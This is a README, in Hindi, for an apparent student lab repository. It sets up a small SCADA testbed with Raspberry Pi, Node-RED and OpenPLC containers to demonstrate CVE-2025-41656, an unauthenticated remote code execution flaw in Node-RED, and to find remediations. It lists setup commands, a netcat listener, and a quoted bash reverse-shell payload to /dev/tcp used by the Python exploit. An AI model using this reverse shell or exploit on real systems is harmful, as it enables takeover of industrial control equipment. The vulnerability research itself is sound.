
इस रिपॉज़िटरी में CVE-2025-41656 के लिए PoC का परीक्षण और निष्पादन करने हेतु आवश्यक कोड और फ़ाइलें शामिल हैं।
यह प्रोजेक्ट CVE-2025-41656 को मॉडल करने के लिए मौजूद है, जो NodeRED के लिए एक अप्रमाणित रिमोट कोड निष्पादन भेद्यता है। इस भेद्यता को मॉडल करने के लिए, हमने एक Raspberry Pi, एक एक्चुएटर और एक सेंसर के साथ एक छोटे फॉर्म फैक्टर वाला SCADA सिस्टम बनाया। Raspberry Pi में एक NodeRED और OpenPLC कंटेनर है जो एक्चुएटर को नियंत्रित करने के लिए Modbus TCP पर एक-दूसरे के साथ संचार करते हैं। यह CVE-2025-41656 हमले को अंजाम देने के लिए एक Python प्रूफ ऑफ कॉन्सेप्ट स्क्रिप्ट है। लक्ष्य सफलतापूर्वक एक PoC बनाना और सिस्टम को सुरक्षित करने के लिए सुधार के उपाय खोजना है।
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
docker container ls
docker network inspect csci587-final-project_scadanet
nc -lvnp 1234 चलाएँcve_2025_41656.py में NODE_RED_IP और NODE_RED_PORT को अपनी NodeRED सेवा के IP पते और पोर्ट (1880) से बदलें।cve_2025_41656 के अंदर, लाइन "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", में दिए गए IP पते को उस मशीन के IP पते से बदलें जिससे आप एक्सप्लॉइट लॉन्च कर रहे हैं।python3 cve_2025_41656.py